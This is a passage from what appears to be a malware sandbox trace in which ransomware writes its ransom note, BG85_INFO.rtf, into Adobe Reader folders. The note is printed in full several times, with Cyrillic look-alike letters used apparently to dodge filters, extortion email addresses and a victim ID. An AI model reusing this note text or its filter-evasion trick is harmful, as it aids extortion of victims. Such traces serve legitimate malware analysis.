y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.539] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.540] CloseHandle (hObject=0x1fc) returned 1 [0064.540] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\fra\\bg85_info.rtf")) returned 0xffffffff [0064.540] GetLastError () returned 0x2 [0064.540] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\fra\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL 